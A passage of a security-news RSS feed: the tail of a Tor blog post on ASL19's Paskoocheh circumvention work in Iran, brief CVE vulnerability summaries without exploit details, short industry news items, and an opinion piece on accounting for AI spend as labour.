<p>During periods of internet disruption and nationwide protests in Iran, these tools became critical communication lifelines. One longtime user wrote to us: </p>
<blockquote><p><em>"I've been using this free app for several years now. It's free, unique, and unlike others, it has no equal." Reflecting on the broader digital environment in the country, they added that "in these difficult economic conditions, people are struggling just to survive, while many apps either empty people's pockets, deceive and lie to them, or serve as tools for spying and propaganda."</em></p>
</blockquote>
<p>Messages like these highlight the importance of privacy-preserving technologies in environments where surveillance, censorship, and disinformation shape everyday life online. In moments of crisis, internet freedom tools become part of how people maintain relationships, exchange trusted information, and stay connected to the outside world. For some users, these tools also made it possible to continue reporting on events on the ground, verify information during periods of state-backed disinformation, and safely communicate evidence of abuses despite widespread surveillance and connectivity disruptions.</p>
<h2>The future of Paskoocheh: Scaling a community-first approach to internet freedom</h2>
<p>As internet censorship tactics evolve rapidly, internet shutdowns are becoming more frequent and more sophisticated, cutting communities off from information, communication, and one another. </p>
<p>What we have learned through this work is that access alone is not enough. Technology is only useful if people trust it, understand how to use it safely, and can rely on support networks when digital spaces become unstable or dangerous.</p>
<p>That is why our work extends beyond technical development. Alongside building secure access technologies, ASL19 invests heavily in user education, digital security guidance, and community capacity building. Every support ticket answered, training delivered, and piece of digital safety guidance shared helps people stay connected under pressure. </p>
<p>This human-centered approach is becoming increasingly important as authoritarian tactics evolve globally. During internet shutdowns and heightened censorship, local helper communities often become the first line of assistance for journalists, activists, students, and ordinary citizens. </p>
<p>With additional support, ASL19 aims to continue expanding Paskoocheh beyond its current capacity into a broader resilience ecosystem that combines technical innovation with stronger on-the-ground support systems. This includes improving access to trusted circumvention and privacy tools during shutdowns, expanding multilingual user support and educational resources, and deepening collaboration with communities operating under digital authoritarianism. </p>
<p>This work is not solely about technology products. At a moment when most people's understanding of the internet is shaped by the little squares in their pockets, it is important to acknowledge and support the broader ecosystems that make access possible. Civil society, independent media, and grassroots communities all play a part in helping people survive under pressure. This is why partnerships within the internet freedom ecosystem matter. Living under digital authoritarianism means that these are not abstract protections against hypothetical risks, but practical tools that make journalism, organizing, education, and communication possible in the first place. </p>
<h3>About ASL19</h3>
<p>Named after Article 19 of the Universal Declaration of Human Rights, ASL19 is a technology and exiled media organization working to counter digital authoritarianism. For more than a decade, we have partnered with civil society groups, journalists, researchers, activists, and internet users living under some of the world's most restrictive online environments. Guided by the belief that privacy and internet freedom are essential to safe communication, access to information, and civic participation, ASL19 develops technologies and support systems that help people navigate censorship, surveillance, internet shutdowns, and information manipulation. In countries such as Iran, Russia, and China, these tools serve as critical lifelines, enabling people to communicate securely, access information, document human rights abuses, and stay connected to the outside world.</p>

    </div>
  <div class="categories">
    <ul><li>
        <a href="https://blog.torproject.org/category/community">
          community
        </a>
      </li><li>
        <a href="https://blog.torproject.org/category/human-rights">
          human rights
        </a>
      </li><li>
        <a href="https://blog.torproject.org/category/partners">
          partners
        </a>
      </li><li>
        <a href="https://blog.torproject.org/category/fundraising">
          fundraising
        </a>
      </li></ul>
  </div>
  </article>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-61239 | Oracle PeopleSoft Enterprise FIN Common Objects Argentina eProcurement improper authorization (CNNVD-2026-99044707)]]></title>
<description><![CDATA[A vulnerability identified as critical has been detected in Oracle PeopleSoft Enterprise FIN Common Objects Argentina 9.1. This impacts an unknown function of the component eProcurement. Performing a manipulation results in improper authorization.

This vulnerability was named CVE-2026-61239. The...]]></description>
<link>https://tsecurity.de/de/3687422/sicherheitsluecken/cve-2026-61239-oracle-peoplesoft-enterprise-fin-common-objects-argentina-eprocurement-improper-authorization-cnnvd-2026-99044707/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687422/sicherheitsluecken/cve-2026-61239-oracle-peoplesoft-enterprise-fin-common-objects-argentina-eprocurement-improper-authorization-cnnvd-2026-99044707/</guid>
<pubDate>Wed, 22 Jul 2026 21:15:52 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">critical</a> has been detected in <a href="https://vuldb.com/product/oracle:peoplesoft_enterprise_fin_common_objects_argentina">Oracle PeopleSoft Enterprise FIN Common Objects Argentina 9.1</a>. This impacts an unknown function of the component <em>eProcurement</em>. Performing a manipulation results in improper authorization.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-61239">CVE-2026-61239</a>. The attack may be initiated remotely. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-3948 | eolinker goku_lite /plugin/getList route/keyword sql injection (EUVD-2022-43282)]]></title>
<description><![CDATA[A vulnerability identified as critical has been detected in eolinker goku_lite. This impacts an unknown function of the file /plugin/getList. Performing a manipulation of the argument route/keyword results in sql injection.

This vulnerability was named CVE-2022-3948. The attack may be initiated ...]]></description>
<link>https://tsecurity.de/de/3687312/sicherheitsluecken/cve-2022-3948-eolinker-gokulite-plugingetlist-routekeyword-sql-injection-euvd-2022-43282/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687312/sicherheitsluecken/cve-2022-3948-eolinker-gokulite-plugingetlist-routekeyword-sql-injection-euvd-2022-43282/</guid>
<pubDate>Wed, 22 Jul 2026 20:35:06 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">critical</a> has been detected in <a href="https://vuldb.com/product/eolinker:goku_lite">eolinker goku_lite</a>. This impacts an unknown function of the file <em>/plugin/getList</em>. Performing a manipulation of the argument <em>route/keyword</em> results in sql injection.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2022-3948">CVE-2022-3948</a>. The attack may be initiated remotely. In addition, an exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-2712 | Eclipse GlassFish up to 6.2.5 path traversal (EUVD-2023-0320)]]></title>
<description><![CDATA[A vulnerability classified as critical has been found in Eclipse GlassFish up to 6.2.5. Affected is an unknown function. Performing a manipulation results in path traversal.

This vulnerability was named CVE-2022-2712. The attack may be initiated remotely. There is no available exploit.]]></description>
<link>https://tsecurity.de/de/3687113/sicherheitsluecken/cve-2022-2712-eclipse-glassfish-up-to-625-path-traversal-euvd-2023-0320/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687113/sicherheitsluecken/cve-2022-2712-eclipse-glassfish-up-to-625-path-traversal-euvd-2023-0320/</guid>
<pubDate>Wed, 22 Jul 2026 19:13:41 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/eclipse:glassfish">Eclipse GlassFish up to 6.2.5</a>. Affected is an unknown function. Performing a manipulation results in path traversal.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2022-2712">CVE-2022-2712</a>. The attack may be initiated remotely. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[Sophos Named a Leader in the IDC MarketScape for Worldwide Managed Detection and Response Services for Midmarket 2026]]></title>
<description><![CDATA[Sophos has been named a Leader in the IDC MarketScape for Worldwide Managed Detection and Response Services for Midmarket 2026, recognizing our intelligence-led MDR, flexible engagement models, and open platform approach.]]></description>
<link>https://tsecurity.de/de/3687011/it-security-nachrichten/sophos-named-a-leader-in-the-idc-marketscape-for-worldwide-managed-detection-and-response-services-for-midmarket-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687011/it-security-nachrichten/sophos-named-a-leader-in-the-idc-marketscape-for-worldwide-managed-detection-and-response-services-for-midmarket-2026/</guid>
<pubDate>Wed, 22 Jul 2026 18:28:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Sophos has been named a Leader in the IDC MarketScape for Worldwide Managed Detection and Response Services for Midmarket 2026, recognizing our intelligence-led MDR, flexible engagement models, and open platform approach.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-56444 | NLnet Labs Unbound up to 1.25.1 Serve Expired Logic resource consumption (EUVD-2026-47685)]]></title>
<description><![CDATA[A vulnerability classified as problematic has been found in NLnet Labs Unbound up to 1.25.1. This issue affects some unknown processing of the component Serve Expired Logic. Performing a manipulation results in resource consumption.

This vulnerability was named CVE-2026-56444. The attack may be ...]]></description>
<link>https://tsecurity.de/de/3686881/sicherheitsluecken/cve-2026-56444-nlnet-labs-unbound-up-to-1251-serve-expired-logic-resource-consumption-euvd-2026-47685/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686881/sicherheitsluecken/cve-2026-56444-nlnet-labs-unbound-up-to-1251-serve-expired-logic-resource-consumption-euvd-2026-47685/</guid>
<pubDate>Wed, 22 Jul 2026 17:31:53 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/nlnet_labs:unbound">NLnet Labs Unbound up to 1.25.1</a>. This issue affects some unknown processing of the component <em>Serve Expired Logic</em>. Performing a manipulation results in resource consumption.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-56444">CVE-2026-56444</a>. The attack may be initiated remotely. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[On the “HollowByte” denial-of-service report]]></title>
<description><![CDATA[Over the past week a denial-of-service (DoS) report against OpenSSL, named “HollowByte” by the Okta Red Team who reported it, has received a good deal of press attention. A number of the articles ask reasonable questions about how we assessed…
Read more →
The post On the “HollowByte” denial-of-se...]]></description>
<link>https://tsecurity.de/de/3686698/it-security-nachrichten/on-the-hollowbyte-denial-of-service-report/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686698/it-security-nachrichten/on-the-hollowbyte-denial-of-service-report/</guid>
<pubDate>Wed, 22 Jul 2026 16:39:30 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Over the past week a denial-of-service (DoS) report against OpenSSL, named “HollowByte” by the Okta Red Team who reported it, has received a good deal of press attention. A number of the articles ask reasonable questions about how we assessed…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/on-the-hollowbyte-denial-of-service-report/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/on-the-hollowbyte-denial-of-service-report/">On the “HollowByte” denial-of-service report</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-27171 | zlib up to 1.3.1 crc32_combine64/crc32_combine_gen64 improper validation of specified quantity in input (Issue 904 / Nessus ID 299392)]]></title>
<description><![CDATA[A vulnerability described as problematic has been identified in zlib up to 1.3.1. Impacted is the function crc32_combine64/crc32_combine_gen64. The manipulation results in improper validation of specified quantity in input.

This vulnerability was named CVE-2026-27171. The attack may be performed...]]></description>
<link>https://tsecurity.de/de/3686503/sicherheitsluecken/cve-2026-27171-zlib-up-to-131-crc32combine64crc32combinegen64-improper-validation-of-specified-quantity-in-input-issue-904-nessus-id-299392/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686503/sicherheitsluecken/cve-2026-27171-zlib-up-to-131-crc32combine64crc32combinegen64-improper-validation-of-specified-quantity-in-input-issue-904-nessus-id-299392/</guid>
<pubDate>Wed, 22 Jul 2026 15:29:37 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">problematic</a> has been identified in <a href="https://vuldb.com/product/zlib">zlib up to 1.3.1</a>. Impacted is the function <code>crc32_combine64/crc32_combine_gen64</code>. The manipulation results in improper validation of specified quantity in input.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-27171">CVE-2026-27171</a>. The attack may be performed from remote. There is no available exploit.

Upgrading the affected component is recommended.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-16473 | Red Hat Enterprise Linux SBC Frame Decoder off-by-one (EUVD-2026-47623)]]></title>
<description><![CDATA[A vulnerability categorized as critical has been discovered in Red Hat Enterprise Linux. The affected element is an unknown function of the component SBC Frame Decoder. The manipulation results in off-by-one.

This vulnerability was named CVE-2026-16473. The attack may be performed from remote. T...]]></description>
<link>https://tsecurity.de/de/3686266/sicherheitsluecken/cve-2026-16473-red-hat-enterprise-linux-sbc-frame-decoder-off-by-one-euvd-2026-47623/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686266/sicherheitsluecken/cve-2026-16473-red-hat-enterprise-linux-sbc-frame-decoder-off-by-one-euvd-2026-47623/</guid>
<pubDate>Wed, 22 Jul 2026 14:25:24 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">critical</a> has been discovered in <a href="https://vuldb.com/product/red_hat:enterprise_linux">Red Hat Enterprise Linux</a>. The affected element is an unknown function of the component <em>SBC Frame Decoder</em>. The manipulation results in off-by-one.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-16473">CVE-2026-16473</a>. The attack may be performed from remote. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-63261 | Elastic Kibana up to 8.19.18/9.3.7/9.4.3 Machine Learning resource consumption (EUVD-2026-47589)]]></title>
<description><![CDATA[A vulnerability was found in Elastic Kibana up to 8.19.18/9.3.7/9.4.3. It has been declared as problematic. This affects an unknown function of the component Machine Learning. The manipulation results in resource consumption.

This vulnerability was named CVE-2026-63261. The attack may be perform...]]></description>
<link>https://tsecurity.de/de/3686154/sicherheitsluecken/cve-2026-63261-elastic-kibana-up-to-81918937943-machine-learning-resource-consumption-euvd-2026-47589/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686154/sicherheitsluecken/cve-2026-63261-elastic-kibana-up-to-81918937943-machine-learning-resource-consumption-euvd-2026-47589/</guid>
<pubDate>Wed, 22 Jul 2026 13:41:21 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/elastic:kibana">Elastic Kibana up to 8.19.18/9.3.7/9.4.3</a>. It has been declared as <a href="https://vuldb.com/kb/risk">problematic</a>. This affects an unknown function of the component <em>Machine Learning</em>. The manipulation results in resource consumption.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-63261">CVE-2026-63261</a>. The attack may be performed from remote. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-3918 | Apple swift-corelibs-foundation crlf injection (GHSA-4pp3-mpf2-rj63 / EUVD-2022-43253)]]></title>
<description><![CDATA[A vulnerability was found in Apple swift-corelibs-foundation. It has been declared as problematic. This affects an unknown part. The manipulation results in crlf injection.

This vulnerability was named CVE-2022-3918. The attack needs to be approached within the local network. There is no availab...]]></description>
<link>https://tsecurity.de/de/3686058/sicherheitsluecken/cve-2022-3918-apple-swift-corelibs-foundation-crlf-injection-ghsa-4pp3-mpf2-rj63-euvd-2022-43253/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686058/sicherheitsluecken/cve-2022-3918-apple-swift-corelibs-foundation-crlf-injection-ghsa-4pp3-mpf2-rj63-euvd-2022-43253/</guid>
<pubDate>Wed, 22 Jul 2026 13:04:00 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/apple:swift-corelibs-foundation">Apple swift-corelibs-foundation</a>. It has been declared as <a href="https://vuldb.com/kb/risk">problematic</a>. This affects an unknown part. The manipulation results in crlf injection.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2022-3918">CVE-2022-3918</a>. The attack needs to be approached within the local network. There is no available exploit.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-44850 | portainer Community Edition up to 2.33.7/2.39.1/2.40.x Portainer-mediated Docker API authorization (GHSA-7fw3-x4r2-g7wc)]]></title>
<description><![CDATA[A vulnerability was found in portainer Community Edition up to 2.33.7/2.39.1/2.40.x. It has been classified as critical. Affected is an unknown function of the component Portainer-mediated Docker API. Performing a manipulation results in incorrect authorization.

This vulnerability was named CVE-...]]></description>
<link>https://tsecurity.de/de/3686056/sicherheitsluecken/cve-2026-44850-portainer-community-edition-up-to-23372391240x-portainer-mediated-docker-api-authorization-ghsa-7fw3-x4r2-g7wc/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686056/sicherheitsluecken/cve-2026-44850-portainer-community-edition-up-to-23372391240x-portainer-mediated-docker-api-authorization-ghsa-7fw3-x4r2-g7wc/</guid>
<pubDate>Wed, 22 Jul 2026 13:03:58 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/portainer:community_edition">portainer Community Edition up to 2.33.7/2.39.1/2.40.x</a>. It has been classified as <a href="https://vuldb.com/kb/risk">critical</a>. Affected is an unknown function of the component <em>Portainer-mediated Docker API</em>. Performing a manipulation results in incorrect authorization.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-44850">CVE-2026-44850</a>. The attack may be initiated remotely. There is no available exploit.

Upgrading the affected component is recommended.]]></content:encoded>
</item>
<item>
<title><![CDATA[US seizes over 1,000 domains used for illegal World Cup 2026 streams]]></title>
<description><![CDATA[The US Department of Justice has seized more than 1,000 internet domains that streamed FIFA World Cup 2026 matches without a license. The domain seizure notice (Source: US Department of Justice) The seizures came in three waves over the course of the tournament. The first two rounds took down nea...]]></description>
<link>https://tsecurity.de/de/3686018/it-security-nachrichten/us-seizes-over-1000-domains-used-for-illegal-world-cup-2026-streams/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686018/it-security-nachrichten/us-seizes-over-1000-domains-used-for-illegal-world-cup-2026-streams/</guid>
<pubDate>Wed, 22 Jul 2026 13:00:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The US Department of Justice has seized more than 1,000 internet domains that streamed FIFA World Cup 2026 matches without a license. The domain seizure notice (Source: US Department of Justice) The seizures came in three waves over the course of the tournament. The first two rounds took down nearly 400 domains by the end of June, and two later rounds pushed the total past 1,000. The effort, named “Operation Offsides”, was led by the … <a href="https://www.helpnetsecurity.com/2026/07/22/world-cup-2026-illegal-stream-domains-seized/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/22/world-cup-2026-illegal-stream-domains-seized/">US seizes over 1,000 domains used for illegal World Cup 2026 streams</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The AI bill is the easy part. The hard part is everything it changed]]></title>
<description><![CDATA[Your CFO has a simple question. “We’re spending more on AI. What are we getting for it?” Most CIOs cannot answer it — not because AI isn’t creating value, but because the accounting systems we inherited were built before AI existed as a category of labor.



This June, the conversation shifted fr...]]></description>
<link>https://tsecurity.de/de/3685909/it-security-nachrichten/the-ai-bill-is-the-easy-part-the-hard-part-is-everything-it-changed/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685909/it-security-nachrichten/the-ai-bill-is-the-easy-part-the-hard-part-is-everything-it-changed/</guid>
<pubDate>Wed, 22 Jul 2026 12:14:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Your CFO has a simple question. “We’re spending more on AI. What are we getting for it?” Most CIOs cannot answer it — not because AI isn’t creating value, but because the accounting systems we inherited were built before AI existed as a category of labor.</p>



<p class="wp-block-paragraph">This June, the conversation shifted from token maxing to token cutting. <a href="https://www.nytimes.com/">The New York Times</a> reported that Meta, Uber, Walmart and Amazon are capping employee AI usage. Uber blew through its 2026 AI budget in four months. Satya Nadella started framing it as human capital versus token capital.</p>



<p class="wp-block-paragraph">All of that is true. None of it answers the CFO. Capping tokens is an input lever, not an output measure. And the <a href="https://www.cio.com/article/4178320/tokenmaxxing-when-ai-adoption-metrics-go-bad.html">human-versus-token framing</a> names two sources of labor when the reality is four.</p>



<h2 class="wp-block-heading">The enterprise now has 4 sources of labor</h2>



<p class="wp-block-paragraph">There are humans. There are humans assisted by AI. Humans are working alongside AI. And humans are managing AI. Sources two through four are all supervised machine labor at different intensities — none of them have a line item, a manager or an hourly rate. In our <a href="https://withlanai.com/ai-labor-report">2026 AI Labor Report</a>, 78% of leaders view AI as both software and a labor force. The org chart has not caught up. Neither has the P&amp;L.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/table-1-four-source-framework.png?w=1024" alt="Four-source framework and A-Level taxonomy: Lanai  ·  Lanai / Wakefield Research, n=200, March–April 2026" class="wp-image-4198947" width="1024" height="502" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><em>Four-source framework and A-Level taxonomy: Lanai  ·  Lanai / Wakefield Research, n=200, March–April 2026</em></figcaption></figure><p class="imageCredit">Lexi Reese</p></div>



<p class="wp-block-paragraph">Most enterprises are stuck at A-Level 1 with no accounting for any of it, while quietly sliding into A-Level 2. The job descriptions have not caught up. The budget has not caught up. You cannot upskill into a role that has not been named.</p>



<p class="wp-block-paragraph">AI is the only category of work the modern enterprise has ever bought without a system of record for what it produced.</p>



<h2 class="wp-block-heading">What you are actually running is supervised machine labor</h2>



<p class="wp-block-paragraph">The model does a first pass. A human makes it usable. One hundred percent of leaders we surveyed said AI work requires human review before it ships; 34% said substantial editing. That is a workforce with no manager, no hourly rate and no line on the income statement.</p>



<h3 class="wp-block-heading">The accounting breaks in 3 places at once</h3>



<p class="wp-block-paragraph">Under GAAP: COGS if it helps produce the product, OpEx if it does work for you. The same workflow can hit all three buckets at once. A tier-one support resolution involves the human’s salary (OpEx), the AI’s tokens (COGS if support is a delivered service), and the supervisor’s review time (OpEx). Three buckets. One piece of work. No reconciliation. The token invoice arrives from Anthropic or OpenAI and gets coded to OpEx-software because that is what the bill looks like. Audit partners will be asking about this by next year.</p>



<p class="wp-block-paragraph">When you call AI a tool, you book it like software. When you call it labor, you have to ask which kind and what it is producing.</p>



<h2 class="wp-block-heading">The per-employee number is the wrong unit</h2>



<p class="wp-block-paragraph">Per-employee AI spend collapses a workforce into a per-head average. It hides the only number that matters: What AI is producing inside each workflow.</p>



<p class="wp-block-paragraph">Lanai measured two teams inside the same finance organization. Same monthly prep and variance analysis. AI took the same amount of time to produce outputs of similar quality. The only variable was the model each team reached for by default — a choice nobody had made deliberately and <a href="https://withlanai.com/ai-labor-report">nobody had seen until it was measured</a>.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/table-2-white-labeled-example.png?w=1024" alt="White-labeled example. Workflow profile, hours and economics drawn from a representative customer engagement." class="wp-image-4198945" width="1024" height="485" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><em>White-labeled example. Workflow profile, hours and economics drawn from a representative customer engagement.</em></figcaption></figure><p class="imageCredit">Lexi Reese</p></div>



<p class="wp-block-paragraph">The gap existed for months before anyone saw it.</p>



<p class="wp-block-paragraph">Faith-based budgeting — the organizational equivalent of putting money in the collection plate and hoping God handles the ROI — is what made it invisible.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/table-3-lanai-wakefield-research.png?w=1024" alt="Lanai / Wakefield Research  ·  n=200  ·  U.S. enterprises 1,000+  ·  March–April 2026" class="wp-image-4198944" width="1024" height="199" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><em>Lanai / Wakefield Research  ·  n=200  ·  U.S. enterprises 1,000+  ·  March–April 2026</em></figcaption></figure><p class="imageCredit">Lexi Reese</p></div>



<h2 class="wp-block-heading">AI labor orphaning</h2>



<p class="wp-block-paragraph">That is not a measurement problem. It is a category error. We call it AI Labor Orphaning. AI does the work. The output gets credited to the human who approved it. The token bill lands in OpEx-software. The supervision time absorbs into salaried hours nobody is auditing. Eighty-seven percent of leaders admitted AI output is sometimes or always credited entirely to the human employee. This is the last-click attribution problem of the AI era, running in reverse.</p>



<p class="wp-block-paragraph">What fills the vacuum? Belief. Forty-three percent assume that if AI was involved, it contributed. Only twelve percent have a clear methodology. Seventy-nine percent are worried AI budgets will be cut because they cannot connect spend to results. The cuts are not coming because AI does not work. They are coming because nobody can prove that it did.</p>



<p class="wp-block-paragraph">Capping tokens may look like responsible governance, but it is like turning off a staticky radio rather than tuning the dial. The companies cutting AI budgets in 2026 will discover in 2027 that they cut the workflows that worked alongside the ones that did not.</p>



<h2 class="wp-block-heading">The real cost of AI is not the model. It is the redesign</h2>



<p class="wp-block-paragraph">Three layers. Most organizations only manage the first.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/table-4-managing-layer-one.png?w=1024" alt="Managing Layer 1 without Layers 2 and 3 is how you optimize the invoice while missing the transformation." class="wp-image-4198946" width="1024" height="335" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><em>Managing Layer 1 without Layers 2 and 3 is how you optimize the invoice while missing the transformation.</em></figcaption></figure><p class="imageCredit">Lexi Reese</p></div>



<h2 class="wp-block-heading">What to actually do</h2>



<p class="wp-block-paragraph">The <a href="https://withlanai.com/ai-labor-report">12% of organizations</a> that can answer the CFO treat AI like every other category of labor — with a cost per AI Work Hour that is accounted for by a set of AI assistants, co-pilots and agents that are held accountable to performance standards. </p>



<ul class="wp-block-list">
<li>Audit the four sources separately. Each A-Level has different token economics, SaaS implications and human redesign requirements.</li>



<li>Find the embedded SaaS repricing before your next renewal. Pull your top 20 contracts. Ask whether AI features previously included are now priced incrementally.</li>



<li>Redesign the human role at A-Level 2 before you scale it. You cannot upskill into a role that has not been named.</li>



<li>Build a system of record before you build the next agent. Start with one department. Two weeks. You will find something that surprises you.</li>



<li>Stop calling it a tool. Start calling it labor. The language determines the chart of accounts.</li>
</ul>



<p class="wp-block-paragraph">When your blended AI rate is $22 an hour, the conversation shifts from ‘we spent $340,000 on AI’ to ‘we acquired a skilled workforce at $22 an hour.’ That sentence is defensible. A vendor invoice is not.</p>



<p class="wp-block-paragraph">The CIOs who will have a defensible AI story in 2027 are the ones who renamed the work in 2026. Not because technology changed. Because they finally built the accounting to see it.</p>



<p class="wp-block-paragraph"><em>Findings are drawn from the </em><a href="https://withlanai.com/ai-labor-report">2026 AI Labor Report</a><em>, fielded by Wakefield Research with 200 senior technology leaders at US enterprises of 1,000-plus employees, March 20–April 8, 2026 (±6.9pp at 95% confidence).</em></p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-35209 | unjs defu up to 6.1.4 prototype pollution (GHSA-737v-mqg7-c878)]]></title>
<description><![CDATA[A vulnerability identified as problematic has been detected in unjs defu up to 6.1.4. This issue affects the function defu. Performing a manipulation results in improperly controlled modification of object prototype attributes.

This vulnerability was named CVE-2026-35209. The attack may be initi...]]></description>
<link>https://tsecurity.de/de/3685799/sicherheitsluecken/cve-2026-35209-unjs-defu-up-to-614-prototype-pollution-ghsa-737v-mqg7-c878/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685799/sicherheitsluecken/cve-2026-35209-unjs-defu-up-to-614-prototype-pollution-ghsa-737v-mqg7-c878/</guid>
<pubDate>Wed, 22 Jul 2026 11:33:25 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">problematic</a> has been detected in <a href="https://vuldb.com/product/unjs:defu">unjs defu up to 6.1.4</a>. This issue affects the function <code>defu</code>. Performing a manipulation results in improperly controlled modification of object prototype attributes.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-35209">CVE-2026-35209</a>. The attack may be initiated remotely. There is no available exploit.

You should upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[From outsourcing to ownership: How we brought development in-house without breaking delivery]]></title>
<description><![CDATA[Outsourcing worked – until it didn’t.



After Akirolabs achieved early market validation and onboarded its first enterprise customers, outsourcing began to create strategic limitations around scalability, intellectual property (IP) ownership, security and delivery execution.



The challenges st...]]></description>
<link>https://tsecurity.de/de/3685759/it-security-nachrichten/from-outsourcing-to-ownership-how-we-brought-development-in-house-without-breaking-delivery/</link>
